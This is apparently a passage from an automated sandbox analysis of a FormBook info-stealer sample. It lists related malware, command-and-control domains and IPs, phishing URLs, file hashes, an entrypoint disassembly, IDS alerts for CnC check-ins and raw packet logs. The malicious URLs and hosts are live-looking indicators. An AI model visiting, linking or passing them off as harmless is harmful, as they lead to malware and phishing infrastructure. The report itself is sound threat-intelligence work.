	1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exe	Get hash	malicious	FormBook	Browse	www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	http://embittermentdc.com	Get hash	malicious	Unknown	Browse	embittermentdc.com/favicon.ico
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3
	IRYzGMMbSw.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/yuvr/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	http://www.thegulfthermale.com.tr/antai/12/3dsec.php	Get hash	malicious	Unknown	Browse	www.thegulfthermale.com.tr/antai/12/3dsec.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	ROQ_972923.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	b6N1GKfKdR.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	8EhMjL3yNF.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	BAJFMONYm2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	jpdy1E8K4A.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Products Order Catalogs20242.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rpedido-002297.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	DHL_ 46773482.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.alanshortz.buzz	NOAH CRYPT.exe	Get hash	malicious	FormBook	Browse	161.97.168.245
www.alanshortz.buzz	SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsx	Get hash	malicious	FormBook	Browse	161.97.168.245
www.mtmoriacolives.store	TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
www.sendly.digital	Shipping document_pdf.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
www.sendly.digital	payment voucher.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
www.avantfize.shop	Request for Quotation + sample catalog.vbs	Get hash	malicious	FormBook	Browse	104.21.31.142
www.avantfize.shop	Document 21824RXVPO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.97.3
www.le-pier.online	RBNB5FNsEZ.exe	Get hash	malicious	FormBook	Browse	217.76.128.34
www.le-pier.online	SecuriteInfo.com.Trojan.AutoIt.1430.5594.14591.exe	Get hash	malicious	FormBook	Browse	217.76.128.34
www.zippio.top	TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Get hash	malicious	FormBook	Browse	203.161.46.201
yqcpbackzx.javalebogame004.com	custom_clearance_notification_20240918.exe	Get hash	malicious	FormBook	Browse	185.99.134.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://clickproxy.retailrocket.net/?url=https://veritasbd.net//cgibin/bin/philipp.ettle/cGhpbGlwcC5ldHRsZUBid3QtcGhhcm1hLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exe	Get hash	malicious	Unknown	Browse	172.67.143.163
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	YyhAkj09dy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SecuriteInfo.com.Trojan-Ransom.Win32.Zerber.gkca.4990.15640.exe	Get hash	malicious	Unknown	Browse	172.67.143.163
	Swift Payment.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	104.26.12.205
	up7bJYQosk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SP0npSA64a.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
KKRUS	na.elf	Get hash	malicious	Mirai	Browse	209.146.99.38
	http://sebayp.com/	Get hash	malicious	Unknown	Browse	209.146.125.12
	http://sebayb.com/index/user/login.html	Get hash	malicious	Unknown	Browse	209.146.125.12
	154.216.18.223-mips-2024-08-17T03_44_00.elf	Get hash	malicious	Mirai	Browse	203.193.13.211
	bJTfMUzlNE.elf	Get hash	malicious	Mirai	Browse	209.146.51.79
	0GJSC4Ua2K.elf	Get hash	malicious	Unknown	Browse	209.146.99.244
	MY69DoYgp5.elf	Get hash	malicious	Mirai	Browse	209.146.51.71
	nJxzVVuTCn.elf	Get hash	malicious	Unknown	Browse	209.146.117.220
	jDK4KtkjAq.elf	Get hash	malicious	Mirai, Moobot	Browse	209.146.87.81
	VwSK2JF5Lx.elf	Get hash	malicious	Mirai	Browse	209.146.117.201
ONEANDONE-ASBrauerstrasse48DE	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	217.160.0.147
	zmhPgbED7M.exe	Get hash	malicious	FormBook	Browse	74.208.236.25
	NU1aAbSmCr.exe	Get hash	malicious	FormBook	Browse	217.160.0.231
	pQGOxS84rW.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.165.67.119
	http://gastrotrade24.org/	Get hash	malicious	Unknown	Browse	217.160.0.174
	BAJFMONYm2.exe	Get hash	malicious	FormBook	Browse	74.208.236.183
	N2Qncau2rN.exe	Get hash	malicious	FormBook	Browse	74.208.236.25
	http://lifecodigestion.com	Get hash	malicious	Unknown	Browse	217.76.142.239
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	195.20.232.175
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	195.20.232.175
ARUBA-ASNIT	PAYMENT ADVISE#9879058.exe	Get hash	malicious	FormBook	Browse	62.149.128.40
	High Court Summons Notice.pdf	Get hash	malicious	Unknown	Browse	95.110.136.136
	Arrival notice.exe	Get hash	malicious	FormBook	Browse	62.149.128.40
	na.elf	Get hash	malicious	Mirai	Browse	31.14.139.69
	novo.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	95.110.195.186
	SHIPPING_DOCUMENTS.VBS.vbs	Get hash	malicious	FormBook	Browse	62.149.128.40
	https://h567268.linp067.arubabusiness.it/SI1892190290/am	Get hash	malicious	Unknown	Browse	80.88.87.86
	https://h567268.linp067.arubabusiness.it/SI1892190290/	Get hash	malicious	Unknown	Browse	80.88.87.86
	https://h567268.linp067.arubabusiness.it/BOKMANDOKL/am/infospage.php	Get hash	malicious	Unknown	Browse	80.88.87.86
	https://terios.shop/	Get hash	malicious	Unknown	Browse	217.61.13.96

Process:	C:\Windows\SysWOW64\MRINFO.EXE
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.991786482897504
TrID:	Win32 Executable (generic) a (10002005/4) 99.98% DOS Executable Generic (2002/1) 0.02%
File name:	alWUxZvrvU.exe
File size:	284'672 bytes
MD5:	68e26fff2e508bfecf7fcc9a2c0c8805
SHA1:	eb769b51f5e141e8a13181e2894fec0eacf84dee
SHA256:	df0c29738d26225d66d84b875da95446c3a523c4ee1541714594f72991902868
SHA512:	15a7498c03c68e50865fc01c16f71d9ea75df3eb7df167a31ace874555f4e875647cff2bc755796a42034ddb10e153e4b902d48d7e217e7a02a4b4480fccf47f
SSDEEP:	6144:ngRJR7OQ594lNfTekBzqv9qVNBMw/tbkXWVx1xKF3Mm5:gRJ0Qqqgzy9qum4Vp
TLSH:	8D5423C5A04BE96EE50A0B7A756700F154FB9F753EAE1123521A2DA7D00C0F637EAA0D
File Content Preview:	MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......[.................T...................p....@................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4013e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5B0F86FD [Thu May 31 05:24:13 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000002E4h
push ebx
push esi
push edi
push 000002DCh
lea eax, dword ptr [ebp-000002E0h]
push 00000000h
push eax
mov dword ptr [ebp-000002E4h], 00000000h
call 00007F2434BD532Ch
add esp, 0Ch
mov ecx, 00005762h
mov edi, 000054C8h
mov eax, 3E88CB3Dh
imul edi
sar edx, 05h
mov edi, edx
shr edi, 1Fh
add edi, edx
jne 00007F2434BD367Fh
lea esp, dword ptr [esp+00000000h]
mov eax, B60B60B7h
imul ecx
add edx, ecx
sar edx, 06h
mov ecx, edx
shr ecx, 1Fh
add ecx, edx
jne 00007F2434BD367Dh
call 00007F2434BD55CBh
mov dword ptr [ebp-000001D4h], eax
lea eax, dword ptr [ebp-000002E0h]
push eax
push 00002BF8h
call 00007F2434BD33F4h
add esp, 08h
mov ecx, 00001E40h
mov edx, 00000029h
mov eax, 00000026h
cmp eax, 29h
cmovnle eax, edx
dec ecx
jne 00007F2434BD3689h
mov ecx, 00005CD5h
mov edx, 000000F3h
mov eax, 00000019h
jmp 00007F2434BD3695h
lea ecx, dword ptr [ecx+00h]
cmp eax, 000000F3h
cmovnle eax, edx
dec ecx
jne 00007F2434BD3687h
lea eax, dword ptr [ebp-00000210h]
push eax
push 00007BB8h

Rich Headers

Programming Language:

[C++] VS2012 build 50727
[ASM] VS2012 build 50727
[LNK] VS2012 build 50727

Data Directories

Name	Virtual Address	Virtual Size
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x45384	0x45400	7dad7a457b1fa18579faa2807f9706c3	False	0.9887254625451264	data	7.995617711588282	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-10T14:12:00.638859+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50038	85.159.66.93	80	TCP
2024-10-10T14:12:34.680981+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49736	194.58.112.174	80	TCP
2024-10-10T14:12:50.500588+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49737	62.149.128.40	80	TCP
2024-10-10T14:12:53.049440+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49738	62.149.128.40	80	TCP
2024-10-10T14:12:53.049440+0200	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.4	49738	62.149.128.40	80	TCP
2024-10-10T14:12:55.759636+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49740	62.149.128.40	80	TCP
2024-10-10T14:12:58.299649+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49752	62.149.128.40	80	TCP
2024-10-10T14:13:05.231127+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49793	185.99.134.9	80	TCP
2024-10-10T14:13:07.777703+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49806	185.99.134.9	80	TCP
2024-10-10T14:13:10.352393+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49822	185.99.134.9	80	TCP
2024-10-10T14:13:32.737427+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49838	185.99.134.9	80	TCP
2024-10-10T14:13:38.587284+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49994	217.76.128.34	80	TCP
2024-10-10T14:13:41.128834+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50010	217.76.128.34	80	TCP
2024-10-10T14:13:43.786802+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50013	217.76.128.34	80	TCP
2024-10-10T14:13:46.297111+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50014	217.76.128.34	80	TCP
2024-10-10T14:13:52.274155+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50015	209.146.101.85	80	TCP
2024-10-10T14:13:54.868096+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50016	209.146.101.85	80	TCP
2024-10-10T14:13:57.393572+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50017	209.146.101.85	80	TCP
2024-10-10T14:13:59.930447+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50018	209.146.101.85	80	TCP
2024-10-10T14:14:05.613031+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50019	188.114.97.3	80	TCP
2024-10-10T14:14:08.131956+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	188.114.97.3	80	TCP
2024-10-10T14:14:10.668388+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50021	188.114.97.3	80	TCP
2024-10-10T14:14:13.291618+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50022	188.114.97.3	80	TCP
2024-10-10T14:14:19.711211+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50023	203.161.46.201	80	TCP
2024-10-10T14:14:22.151816+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	203.161.46.201	80	TCP
2024-10-10T14:14:24.821000+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50025	203.161.46.201	80	TCP
2024-10-10T14:14:27.413214+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50026	203.161.46.201	80	TCP
2024-10-10T14:14:33.177935+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50027	161.97.168.245	80	TCP
2024-10-10T14:14:35.716535+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	161.97.168.245	80	TCP
2024-10-10T14:14:38.262215+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50029	161.97.168.245	80	TCP
2024-10-10T14:14:40.818749+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50030	161.97.168.245	80	TCP
2024-10-10T14:14:47.611176+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50031	103.42.108.46	80	TCP
2024-10-10T14:14:50.084187+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	103.42.108.46	80	TCP
2024-10-10T14:14:52.651104+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50033	103.42.108.46	80	TCP
2024-10-10T14:14:56.175137+0200	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50034	103.42.108.46	80	TCP
2024-10-10T14:15:11.074635+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50035	85.159.66.93	80	TCP
2024-10-10T14:15:13.712024+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50036	85.159.66.93	80	TCP
2024-10-10T14:15:16.258993+0200	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50037	85.159.66.93	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 10, 2024 14:12:33.987627029 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:33.992717028 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:33.992851973 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.002047062 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.007508993 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.680771112 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.680835009 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.680871010 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.680903912 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.680936098 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.680969000 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.680980921 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.680980921 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.681000948 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.681019068 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.681034088 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.681065083 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.681101084 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.681134939 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:34.681142092 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.681142092 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.681205034 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.686471939 CEST	49736	80	192.168.2.4	194.58.112.174
Oct 10, 2024 14:12:34.691430092 CEST	80	49736	194.58.112.174	192.168.2.4
Oct 10, 2024 14:12:49.812182903 CEST	49737	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:49.817029953 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:49.817106009 CEST	49737	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:49.828502893 CEST	49737	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:49.833316088 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:50.500413895 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:50.500477076 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:50.500514030 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:50.500546932 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:50.500580072 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:50.500587940 CEST	49737	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:50.500587940 CEST	49737	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:50.500616074 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:50.500646114 CEST	80	49737	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:50.500663996 CEST	49737	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:50.500754118 CEST	49737	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:51.340481043 CEST	49737	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:52.358541965 CEST	49738	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:52.363816023 CEST	80	49738	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:52.363925934 CEST	49738	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:52.373155117 CEST	49738	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:52.378021955 CEST	80	49738	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:53.049371958 CEST	80	49738	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:53.049396038 CEST	80	49738	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:53.049411058 CEST	80	49738	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:53.049438000 CEST	80	49738	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:53.049439907 CEST	49738	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:53.049453020 CEST	80	49738	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:53.049469948 CEST	80	49738	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:53.049500942 CEST	49738	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:53.049536943 CEST	49738	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:53.887377024 CEST	49738	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:54.906825066 CEST	49740	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:55.061278105 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.063321114 CEST	49740	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:55.075122118 CEST	49740	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:55.080065966 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.080097914 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.080125093 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.080172062 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.080199003 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.080339909 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.080365896 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.080393076 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.080419064 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.759474039 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.759514093 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.759566069 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.759598970 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.759632111 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.759635925 CEST	49740	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:55.759666920 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.759687901 CEST	49740	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:55.759702921 CEST	80	49740	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:55.759797096 CEST	49740	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:56.590414047 CEST	49740	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:57.609961033 CEST	49752	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:57.614901066 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:57.615009069 CEST	49752	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:57.622734070 CEST	49752	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:57.627643108 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:58.299485922 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:58.299537897 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:58.299572945 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:58.299604893 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:58.299638987 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:58.299649000 CEST	49752	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:58.299673080 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:12:58.299727917 CEST	49752	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:58.299776077 CEST	49752	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:58.302670002 CEST	49752	80	192.168.2.4	62.149.128.40
Oct 10, 2024 14:12:58.307528019 CEST	80	49752	62.149.128.40	192.168.2.4
Oct 10, 2024 14:13:03.712125063 CEST	49793	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:03.717012882 CEST	80	49793	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:03.717089891 CEST	49793	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:03.728096008 CEST	49793	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:03.733067036 CEST	80	49793	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:05.231127024 CEST	49793	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:05.281529903 CEST	80	49793	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:06.249702930 CEST	49806	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:06.254618883 CEST	80	49806	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:06.254710913 CEST	49806	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:06.267926931 CEST	49806	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:06.272855997 CEST	80	49806	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:07.777703047 CEST	49806	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:07.829504967 CEST	80	49806	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.795603037 CEST	49822	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:08.800540924 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.800607920 CEST	49822	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:08.810748100 CEST	49822	80	192.168.2.4	185.99.134.9
Oct 10, 2024 14:13:08.815603971 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.815661907 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.815711021 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.815737963 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.815764904 CEST	80	49822	185.99.134.9	192.168.2.4
Oct 10, 2024 14:13:08.815795898 CEST	80	49822	185.99.134.9	192.168.2.4
